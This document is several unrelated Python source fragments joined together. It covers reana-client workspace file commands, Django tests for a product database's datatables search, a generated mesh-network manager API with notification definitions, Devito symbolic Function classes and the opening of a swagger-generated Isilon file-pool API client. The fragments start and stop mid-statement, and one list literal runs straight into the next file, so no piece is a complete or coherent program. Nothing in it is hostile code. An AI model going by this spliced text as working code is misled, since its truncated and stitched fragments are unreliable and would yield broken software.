The ``rm`` command allow to delete files and directories from workspace.
Note that you can use glob to remove similar files.
Examples:\n
\t $ reana-client rm -w myanalysis.42 data/mydata.csv \n
\t $ reana-client rm -w myanalysis.42 'data/*root*'
""" # noqa: W605
from reana_client.api.client import delete_file
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
if workflow:
for filename in filenames:
try:
response = delete_file(workflow, filename, access_token)
freed_space = 0
for file_ in response["deleted"]:
freed_space += response["deleted"][file_]["size"]
display_message(
f"File {file_} was successfully deleted.", msg_type="success"
)
for file_ in response["failed"]:
display_message(
"Something went wrong while deleting {}.\n"
"{}".format(file_, response["failed"][file_]["error"]),
msg_type="error",
)
if freed_space:
display_message(
f"{freed_space} bytes freed up.", msg_type="success"
)
except FileDeletionError as e:
display_message(str(e), msg_type="error")
if "invoked_by_subcommand" in ctx.parent.__dict__:
sys.exit(1)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message(
"Something went wrong while deleting {}".format(filename),
msg_type="error",
)
if "invoked_by_subcommand" in ctx.parent.__dict__:
sys.exit(1)
@files_group.command("mv")
@click.argument("source")
@click.argument("target")
@add_workflow_option
@check_connection
@add_access_token_options
@click.pass_context
def move_files(ctx, source, target, workflow, access_token): # noqa: D301
"""Move files within workspace.
The ``mv`` command allow to move the files within workspace.
Examples:\n
\t $ reana-client mv data/input.txt input/input.txt
"""
from reana_client.api.client import get_workflow_status, list_files, mv_files
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
if workflow:
try:
current_status = get_workflow_status(workflow, access_token).get("status")
if current_status == "running":
display_message(
"File(s) could not be moved for running workflow", msg_type="error",
)
sys.exit(1)
files = list_files(workflow, access_token)
current_files = [file["name"] for file in files]
if not any(source in item for item in current_files):
display_message(
"Source file(s) {} does not exist in "
"workspace {}".format(source, current_files),
msg_type="error",
)
sys.exit(1)
mv_files(source, target, workflow, access_token)
display_message(
"{} was successfully moved to {}.".format(source, target),
msg_type="success",
)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message("Something went wrong. {}".format(e), msg_type="error")
@files_group.command("du")
@add_workflow_option
@check_connection
@add_access_token_options
@click.option("-s", "--summarize", is_flag=True, help="Display total.")
@click.option(
"--filter",
"filters",
multiple=True,
help="Filter results to show only files that match certain filtering "
"criteria such as file name or size."
"Use `--filter <columm_name>=<column_value>` pairs. "
"Available filters are ``name`` and ``size``.",
)
@human_readable_or_raw_option
@click.pass_context
def workflow_disk_usage(
ctx, workflow, access_token, summarize, filters, human_readable_or_raw
): # noqa: D301
"""Get workspace disk usage.
The ``du`` command allows to chech the disk usage of given workspace.
Examples: \n
\t $ reana-client du -w myanalysis.42 -s \n
\t $ reana-client du -w myanalysis.42 -s --human-readable \n
\t $ reana-client du -w myanalysis.42 --filter name=data/
"""
from reana_client.api.client import get_workflow_disk_usage
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
search_filter = None
headers = ["size", | |
"""
Test suite for the productdb.datatables module
"""
import pytest
from urllib.parse import quote
from django.contrib.auth.models import User
from django.urls import reverse
from django.test import Client
from rest_framework import status
from app.productdb import models
from app.productdb.models import UserProfile, Vendor
pytestmark = pytest.mark.django_db
AUTH_USER = {
"username": "api",
"password": "<PASSWORD>"
}
@pytest.mark.usefixtures("import_default_users")
@pytest.mark.usefixtures("import_default_vendors")
def test_datatables_search_on_vendor_products_endpoint():
test_pid_search_term = "Test Product ID"
v1 = Vendor.objects.get(name="Cisco Systems")
for e in range(1, 50):
models.Product.objects.create(product_id="id %s" % e, vendor=v1)
models.Product.objects.create(product_id=test_pid_search_term, vendor=v1)
url = reverse('productdb:datatables_vendor_products_endpoint', kwargs={"vendor_id": v1.id})
up = UserProfile.objects.get(user=User.objects.get(username=AUTH_USER["username"]))
assert up.regex_search is False, "Use simple search by default"
client = Client()
client.login(**AUTH_USER)
# call without search term
response = client.get(url)
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 50
# call with common search term
response = client.get(url + "?" + quote("search[value]") + "=" + quote(test_pid_search_term))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with case-insensitive common search term
response = client.get(url + "?" + quote("search[value]") + "=" + quote(test_pid_search_term.lower()))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with column search term
response = client.get(url + "?" + quote("columns[0][search][value]") + "=" + quote(test_pid_search_term))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with case-insensitive column search term
response = client.get(url + "?" + quote("columns[0][search][value]") + "=" + quote(test_pid_search_term.lower()))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
@pytest.mark.usefixtures("import_default_users")
@pytest.mark.usefixtures("import_default_vendors")
def test_datatables_search_on_vendor_products_view():
test_pid_search_term = "Test Product ID"
uv = Vendor.objects.get(id=0)
for e in range(1, 50):
models.Product.objects.create(product_id="id %s" % e, vendor=uv)
models.Product.objects.create(product_id=test_pid_search_term, vendor=uv)
# if the vendor is not specified, the unassigned vendor is used
url = reverse('productdb:datatables_vendor_products_view')
up = UserProfile.objects.get(user=User.objects.get(username=AUTH_USER["username"]))
assert up.regex_search is False, "Use simple search by default"
client = Client()
client.login(**AUTH_USER)
# call without search term
response = client.get(url)
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 50
# call with common search term
response = client.get(url + "?" + quote("search[value]") + "=" + quote(test_pid_search_term))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with case-insensitive common search term
response = client.get(url + "?" + quote("search[value]") + "=" + quote(test_pid_search_term.lower()))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with column search term
response = client.get(url + "?" + quote("columns[0][search][value]") + "=" + quote(test_pid_search_term))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with case-insensitive column search term
response = client.get(url + "?" + quote("columns[0][search][value]") + "=" + quote(test_pid_search_term.lower()))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
@pytest.mark.usefixtures("import_default_users")
@pytest.mark.usefixtures("import_default_vendors")
def test_datatables_search_on_list_products_view():
test_pid_search_term = "Test Product ID"
uv = Vendor.objects.get(id=0)
for e in range(1, 50):
models.Product.objects.create(product_id="id %s" % e, vendor=uv)
models.Product.objects.create(product_id=test_pid_search_term, vendor=uv)
url = reverse('productdb:datatables_list_products_view')
up = UserProfile.objects.get(user=User.objects.get(username=AUTH_USER["username"]))
assert up.regex_search is False, "Use simple search by default"
client = Client()
client.login(**AUTH_USER)
# call without search term
response = client.get(url)
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 50
# call with common search term
response = client.get(url + "?" + quote("search[value]") + "=" + quote(test_pid_search_term))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with case-insensitive common search term
response = client.get(url + "?" + quote("search[value]") + "=" + quote(test_pid_search_term.lower()))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with column search term
response = client.get(url + "?" + quote("columns[1][search][value]") + "=" + quote(test_pid_search_term))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with case-insensitive column search term
response = client.get(url + "?" + quote("columns[1][search][value]") + "=" + quote(test_pid_search_term.lower()))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
@pytest.mark.usefixtures("import_default_users")
@pytest.mark.usefixtures("import_default_vendors")
def test_datatables_search_on_list_product_groups_view():
test_pg_search_term = "Test Product Group"
uv = Vendor.objects.get(id=0)
for e in range(1, 50):
models.ProductGroup.objects.create(vendor=uv, name="Product Group %d" % e)
models.ProductGroup.objects.create(name=test_pg_search_term, vendor=uv)
url = reverse('productdb:datatables_list_product_groups')
up = UserProfile.objects.get(user=User.objects.get(username=AUTH_USER["username"]))
assert up.regex_search is False, "Use simple search by default"
client = Client()
client.login(**AUTH_USER)
# call without search term
response = client.get(url)
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 50
# call with common search term
response = client.get(url + "?" + quote("search[value]") + "=" + quote(test_pg_search_term))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with case-insensitive common search term
response = client.get(url + "?" + quote("search[value]") + "=" + quote(test_pg_search_term.lower()))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with column search term
response = client.get(url + "?" + quote("columns[1][search][value]") + "=" + quote(test_pg_search_term))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with case-insensitive column search term
response = client.get(url + "?" + quote("columns[1][search][value]") + "=" + quote(test_pg_search_term.lower()))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
@pytest.mark.usefixtures("import_default_users")
@pytest.mark.usefixtures("import_default_vendors")
def test_datatables_search_on_list_products_by_product_group_view():
test_pid_search_term = "Test Product ID"
uv = Vendor.objects.get(id=0)
pg = models.ProductGroup.objects.create(name="PG1")
for e in range(1, 50):
models.Product.objects.create(product_id="id %s" % e, vendor=uv, product_group=pg)
models.Product.objects.create(product_id=test_pid_search_term, vendor=uv, product_group=pg)
url = reverse('productdb:datatables_list_products_by_group_view', kwargs={"product_group_id": pg.id})
up = UserProfile.objects.get(user=User.objects.get(username=AUTH_USER["username"]))
assert up.regex_search is False, "Use simple search by default"
client = Client()
client.login(**AUTH_USER)
# call without search term
response = client.get(url)
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 50
# call with common search term
response = client.get(url + "?" + quote("search[value]") + "=" + quote(test_pid_search_term))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with case-insensitive common search term
response = client.get(url + "?" + quote("search[value]") + "=" + quote(test_pid_search_term.lower()))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with column search term
response = client.get(url + "?" + quote("columns[0][search][value]") + "=" + quote(test_pid_search_term))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
| |
# There is no restriction on the value of this field.
#
Tuple_dn_getMoteLinks = collections.namedtuple("Tuple_dn_getMoteLinks", ['RC', 'idx', 'utilization', 'numLinks', 'frameId_1', 'slot_1', 'channelOffset_1', 'moteId_1', 'flags_1', 'frameId_2', 'slot_2', 'channelOffset_2', 'moteId_2', 'flags_2', 'frameId_3', 'slot_3', 'channelOffset_3', 'moteId_3', 'flags_3', 'frameId_4', 'slot_4', 'channelOffset_4', 'moteId_4', 'flags_4', 'frameId_5', 'slot_5', 'channelOffset_5', 'moteId_5', 'flags_5', 'frameId_6', 'slot_6', 'channelOffset_6', 'moteId_6', 'flags_6', 'frameId_7', 'slot_7', 'channelOffset_7', 'moteId_7', 'flags_7', 'frameId_8', 'slot_8', 'channelOffset_8', 'moteId_8', 'flags_8', 'frameId_9', 'slot_9', 'channelOffset_9', 'moteId_9', 'flags_9', 'frameId_10', 'slot_10', 'channelOffset_10', 'moteId_10', 'flags_10'])
##
# The getMoteLinks command returns information about links assigned to the mote. The response contains a list of links starting with Nth link on the mote, where N is supplied as the idx parameter in the request. To retrieve all links on the device the user can call this command with idx that increments by number of links returned with priorresponse, until the command returns RC_END_OF_LIST response code. Note that links assigned to a mote may change between API calls.
#
# \param macAddress 8-byte field formatted as a hex.<br/>
# There is no restriction on the value of this field.
# \param idx 2-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
#
# \returns The response to the command, formatted as a #Tuple_dn_getMoteLinks named tuple.
#
def dn_getMoteLinks(self, macAddress, idx) :
res = IpMgrConnectorMuxInternal.send(self, ['getMoteLinks'], {"macAddress" : macAddress, "idx" : idx})
return IpMgrConnectorMux.Tuple_dn_getMoteLinks(**res)
#======================== notifications ===================================
##
# Dictionary of all notification tuples.
#
notifTupleTable = {}
##
# \brief MANAGER_HELLO notification.
#
# Sent by the manager to a initiate new session with a client.
#
# Formatted as a Tuple_manager_hello named tuple. It contains the following fields:
# - <tt>version</tt> 1-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>mode</tt> 1-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
#
MANAGER_HELLO = "manager_hello"
notifTupleTable[MANAGER_HELLO] = Tuple_manager_hello = collections.namedtuple("Tuple_manager_hello", ['version', 'mode'])
##
# \brief EVENTMOTERESET notification.
#
# This notification is sent when a user-initiated reset is executed by the manager.
#
# Formatted as a Tuple_eventMoteReset named tuple. It contains the following fields:
# - <tt>eventId</tt> 4-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>macAddress</tt> 8-byte field formatted as a hex.<br/>
# There is no restriction on the value of this field.
#
EVENTMOTERESET = "eventMoteReset"
notifTupleTable[EVENTMOTERESET] = Tuple_eventMoteReset = collections.namedtuple("Tuple_eventMoteReset", ['eventId', 'macAddress'])
##
# \brief EVENTNETWORKRESET notification.
#
# This notification is sent when the manager starts the network. This event has no eventData fields.
#
# Formatted as a Tuple_eventNetworkReset named tuple. It contains the following fields:
# - <tt>eventId</tt> 4-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
#
EVENTNETWORKRESET = "eventNetworkReset"
notifTupleTable[EVENTNETWORKRESET] = Tuple_eventNetworkReset = collections.namedtuple("Tuple_eventNetworkReset", ['eventId'])
##
# \brief EVENTCOMMANDFINISHED notification.
#
# The commandFinished notification is sent when a command associated with the provided callback id finishes executing.
#
# Formatted as a Tuple_eventCommandFinished named tuple. It contains the following fields:
# - <tt>eventId</tt> 4-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>callbackId</tt> 4-byte field formatted as a hex.<br/>
# There is no restriction on the value of this field.
# - <tt>rc</tt> 1-byte field formatted as a int.<br/>
# This field can only take one of the following values:
# - 0: OK
# - 1: nack
# - 2: commandTimeout
#
EVENTCOMMANDFINISHED = "eventCommandFinished"
notifTupleTable[EVENTCOMMANDFINISHED] = Tuple_eventCommandFinished = collections.namedtuple("Tuple_eventCommandFinished", ['eventId', 'callbackId', 'rc'])
##
# \brief EVENTMOTEJOIN notification.
#
# This notification is sent when a mote joins the network.
#
# Formatted as a Tuple_eventMoteJoin named tuple. It contains the following fields:
# - <tt>eventId</tt> 4-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>macAddress</tt> 8-byte field formatted as a hex.<br/>
# There is no restriction on the value of this field.
#
EVENTMOTEJOIN = "eventMoteJoin"
notifTupleTable[EVENTMOTEJOIN] = Tuple_eventMoteJoin = collections.namedtuple("Tuple_eventMoteJoin", ['eventId', 'macAddress'])
##
# \brief EVENTMOTEOPERATIONAL notification.
#
# This notification is sent when a mote that joins the network becomes operational.
#
# Formatted as a Tuple_eventMoteOperational named tuple. It contains the following fields:
# - <tt>eventId</tt> 4-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>macAddress</tt> 8-byte field formatted as a hex.<br/>
# There is no restriction on the value of this field.
#
EVENTMOTEOPERATIONAL = "eventMoteOperational"
notifTupleTable[EVENTMOTEOPERATIONAL] = Tuple_eventMoteOperational = collections.namedtuple("Tuple_eventMoteOperational", ['eventId', 'macAddress'])
##
# \brief EVENTMOTELOST notification.
#
# This notification is sent when a mote's state changes to Lost , which indicates that the mote is not responding to downstream messages.
#
# Formatted as a Tuple_eventMoteLost named tuple. It contains the following fields:
# - <tt>eventId</tt> 4-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>macAddress</tt> 8-byte field formatted as a hex.<br/>
# There is no restriction on the value of this field.
#
EVENTMOTELOST = "eventMoteLost"
notifTupleTable[EVENTMOTELOST] = Tuple_eventMoteLost = collections.namedtuple("Tuple_eventMoteLost", ['eventId', 'macAddress'])
##
# \brief EVENTNETWORKTIME notification.
#
# The time notification is triggered by the client asserting the TIME pin or by calling the getTime command. This notification contains the time when the TIME pin was asserted (or the getTime command was processed) expressed as:
#
# - ASN The absolute slot number (the number of timeslots since " 7/2/2002 8:00:00 PM PST" if UTC is set on manager, otherwise since Jan 1, 1970)
#
#
# - Uptime The number of seconds since the device was booted
# - Unixtime The number of seconds and microseconds since Jan 1, 1970 in UTC
#
# Formatted as a Tuple_eventNetworkTime named tuple. It contains the following fields:
# - <tt>eventId</tt> 4-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>uptime</tt> 4-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>utcSecs</tt> 8-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>utcUsecs</tt> 4-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>asn</tt> 5-byte field formatted as a hex.<br/>
# There is no restriction on the value of this field.
# - <tt>asnOffset</tt> 2-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
#
EVENTNETWORKTIME = "eventNetworkTime"
notifTupleTable[EVENTNETWORKTIME] = Tuple_eventNetworkTime = collections.namedtuple("Tuple_eventNetworkTime", ['eventId', 'uptime', 'utcSecs', 'utcUsecs', 'asn', 'asnOffset'])
##
# \brief EVENTPINGRESPONSE notification.
#
# This notification is sent when a reply is received from a mote ping.
#
# Formatted as a Tuple_eventPingResponse named tuple. It contains the following fields:
# - <tt>eventId</tt> 4-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>callbackId</tt> 4-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>macAddress</tt> 8-byte field formatted as a hex.<br/>
# There is no restriction on the value of this field.
# - <tt>delay</tt> 4-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>voltage</tt> 2-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>temperature</tt> 1-byte field formatted as a ints.<br/>
# There is no restriction | |
for `%s`" % self.name)
key = args[self.name]
if len(key.shape) != self.ndim:
raise InvalidArgument("Shape %s of runtime value `%s` does not match "
"dimensions %s" % (key.shape, self.name, self.indices))
if key.dtype != self.dtype:
warning("Data type %s of runtime value `%s` does not match the "
"Function data type %s" % (key.dtype, self.name, self.dtype))
for i, s in zip(self.indices, key.shape):
i._arg_check(args, s, intervals[i])
# Pickling support
_pickle_kwargs = AbstractCachedFunction._pickle_kwargs +\
['grid', 'staggered', 'initializer']
class Function(TensorFunction, Differentiable):
"""A :class:`TensorFunction` providing operations to express
finite-difference approximation. A ``Function`` encapsulates
space-varying data; for time-varying data, use :class:`TimeFunction`.
:param name: Name of the symbol
:param grid: :class:`Grid` object from which to infer the data shape
and :class:`Dimension` indices.
:param space_order: Discretisation order for space derivatives. By default,
``space_order`` points are available on both sides of
a generic point of interest, including those on the grid
border. Sometimes, fewer points may be necessary; in
other cases, depending on the PDE being approximated,
more points may be necessary. In such cases, one
can pass a 3-tuple ``(o, lp, rp)`` instead of a single
integer representing the discretization order. Here,
``o`` is the discretization order, while ``lp`` and ``rp``
indicate how many points are expected on left (``lp``)
and right (``rp``) of a point of interest.
:param shape: (Optional) shape of the domain region in grid points.
:param dimensions: (Optional) symbolic dimensions that define the
data layout and function indices of this symbol.
:param dtype: (Optional) data type of the buffered data.
:param staggered: (Optional) a :class:`Dimension`, or a tuple of :class:`Dimension`s,
or a :class:`Stagger`, defining how the function is staggered.
For example:
* ``staggered=x`` entails discretization on x edges,
* ``staggered=y`` entails discretization on y edges,
* ``staggered=(x, y)`` entails discretization on xy facets,
* ``staggered=NODE`` entails discretization on node,
* ``staggerd=CELL`` entails discretization on cell.
:param padding: (Optional) allocate extra grid points at a space dimension
boundary. These may be used for data alignment. Defaults to 0.
In alternative to an integer, a tuple, indicating the padding
in each dimension, may be passed; in this case, an error is
raised if such tuple has fewer entries then the number of space
dimensions.
:param initializer: (Optional) a callable or an object exposing buffer interface
used to initialize the data. If a callable is provided,
initialization is deferred until the first access to
``data``.
:param allocator: (Optional) an object of type :class:`MemoryAllocator` to
specify where to allocate the function data when running
on a NUMA architecture. Refer to ``default_allocator()``'s
__doc__ for more information about possible allocators.
.. note::
The parameters must always be given as keyword arguments, since
SymPy uses ``*args`` to (re-)create the dimension arguments of the
symbolic function.
.. note::
If the parameter ``grid`` is provided, the values for ``shape``,
``dimensions`` and ``dtype`` will be derived from it.
.. note::
:class:`Function` objects are assumed to be constant in time
and therefore do not support time derivatives. Use
:class:`TimeFunction` for time-varying grid data.
"""
is_Function = True
def __init__(self, *args, **kwargs):
if not self._cached():
super(Function, self).__init__(*args, **kwargs)
# Space order
space_order = kwargs.get('space_order', 1)
if isinstance(space_order, int):
self._space_order = space_order
elif isinstance(space_order, tuple) and len(space_order) == 3:
self._space_order, _, _ = space_order
else:
raise TypeError("`space_order` must be int or 3-tuple of ints")
# Dynamically add derivative short-cuts
self._fd = generate_fd_shortcuts(self)
@classmethod
def __indices_setup__(cls, **kwargs):
grid = kwargs.get('grid')
dimensions = kwargs.get('dimensions')
if grid is None:
if dimensions is None:
raise TypeError("Need either `grid` or `dimensions`")
elif dimensions is None:
dimensions = grid.dimensions
return dimensions
@classmethod
def __shape_setup__(cls, **kwargs):
grid = kwargs.get('grid')
dimensions = kwargs.get('dimensions')
shape = kwargs.get('shape', kwargs.get('shape_global'))
if grid is None:
if shape is None:
raise TypeError("Need either `grid` or `shape`")
elif shape is None:
if dimensions is not None and dimensions != grid.dimensions:
raise TypeError("Need `shape` as not all `dimensions` are in `grid`")
shape = grid.shape_local
elif dimensions is None:
raise TypeError("`dimensions` required if both `grid` and "
"`shape` are provided")
else:
# Got `grid`, `dimensions`, and `shape`. We sanity-check that the
# Dimensions in `dimensions` also appearing in `grid` have same size
# (given by `shape`) as that provided in `grid`
if len(shape) != len(dimensions):
raise ValueError("`shape` and `dimensions` must have the "
"same number of entries")
loc_shape = []
for d, s in zip(dimensions, shape):
if d in grid.dimensions:
size = grid.dimension_map[d]
if size.glb != s and s is not None:
raise ValueError("Dimension `%s` is given size `%d`, "
"while `grid` says `%s` has size `%d` "
% (d, s, d, size.glb))
else:
loc_shape.append(size.loc)
else:
loc_shape.append(s)
shape = tuple(loc_shape)
return shape
def __halo_setup__(self, **kwargs):
halo = kwargs.get('halo')
if halo is not None:
return halo
else:
space_order = kwargs.get('space_order', 1)
if isinstance(space_order, int):
halo = (space_order, space_order)
elif isinstance(space_order, tuple) and len(space_order) == 3:
_, left_points, right_points = space_order
halo = (left_points, right_points)
else:
raise TypeError("`space_order` must be int or 3-tuple of ints")
return tuple(halo if i.is_Space else (0, 0) for i in self.indices)
def __padding_setup__(self, **kwargs):
padding = kwargs.get('padding', 0)
if isinstance(padding, int):
return tuple((padding,)*2 for i in range(self.ndim))
elif isinstance(padding, tuple) and len(padding) == self.ndim:
return tuple((i,)*2 if isinstance(i, int) else i for i in padding)
else:
raise TypeError("`padding` must be int or %d-tuple of ints" % self.ndim)
@property
def space_order(self):
return self._space_order
def sum(self, p=None, dims=None):
"""
Generate a symbolic expression computing the sum of ``p`` points
along the spatial dimensions ``dims``.
:param p: (Optional) the number of summands. Defaults to the
halo extent.
:param dims: (Optional) the :class:`Dimension`s along which the
sum is computed. Defaults to ``self``'s spatial
dimensions.
"""
points = []
for d in (as_tuple(dims) or self.space_dimensions):
if p is None:
lp = self._extent_inhalo[d].left
rp = self._extent_inhalo[d].right
else:
lp = p // 2 + p % 2
rp = p // 2
indices = [d - i for i in range(lp, 0, -1)]
indices.extend([d + i for i in range(rp)])
points.extend([self.subs(d, i) for i in indices])
return sum(points)
def avg(self, p=None, dims=None):
"""
Generate a symbolic expression computing the average of ``p`` points
along the spatial dimensions ``dims``.
:param p: (Optional) the number of summands. Defaults to the
halo extent.
:param dims: (Optional) the :class:`Dimension`s along which the
sum is computed. Defaults to ``self``'s spatial
dimensions.
"""
tot = self.sum(p, dims)
return tot / len(tot.args)
# Pickling support
_pickle_kwargs = TensorFunction._pickle_kwargs +\
['space_order', 'shape_global', 'dimensions']
class TimeFunction(Function):
"""
A special :class:`Function` encapsulating time-varying data.
:param name: Name of the resulting :class:`sympy.Function` symbol
:param grid: :class:`Grid` object from which to infer the data shape
and :class:`Dimension` indices.
:param space_order: Discretisation order for space derivatives. By default,
``space_order`` points are available on both sides of
a generic point of interest, including those on the grid
border. Sometimes, fewer points may be necessary; in
other cases, depending on the PDE being approximated,
more points may be necessary. In such cases, one
can pass a 3-tuple ``(o, lp, rp)`` instead of a single
integer representing the discretization order. Here,
``o`` is the discretization order, while ``lp`` and ``rp``
indicate how many points are expected on left (``lp``)
and right (``rp``) of a point of interest.
:param time_order: Discretization order for time derivatives.
:param shape: (Optional) shape of the domain region in grid points.
:param dimensions: (Optional) symbolic dimensions that define the
data layout and function indices of this symbol.
:param dtype: (Optional) data type of the buffered data.
:param save: (Optional) defaults to `None`, which indicates the use of
alternating buffers. This enables cyclic writes to the
TimeFunction. For example, if the TimeFunction ``u(t, x)`` has
shape (3, 100), then, in an :class:`Operator`, ``t`` will
assume the values ``1, 2, 0, 1, 2, 0, 1, ...`` (note that the
very first value depends on the stencil equation in which
``u`` is written.). The default size of the time buffer when
``save=None`` is ``time_order + 1``. To | |
<reponame>Atomicology/isilon_sdk_python
# coding: utf-8
"""
FilepoolApi.py
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class FilepoolApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def create_filepool_policy(self, filepool_policy, **kwargs):
"""
Create a new policy.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_filepool_policy(filepool_policy, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param FilepoolPolicyCreateParams filepool_policy: (required)
:return: CreateFilepoolPolicyResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filepool_policy']
all_params.append('callback')
params = locals()
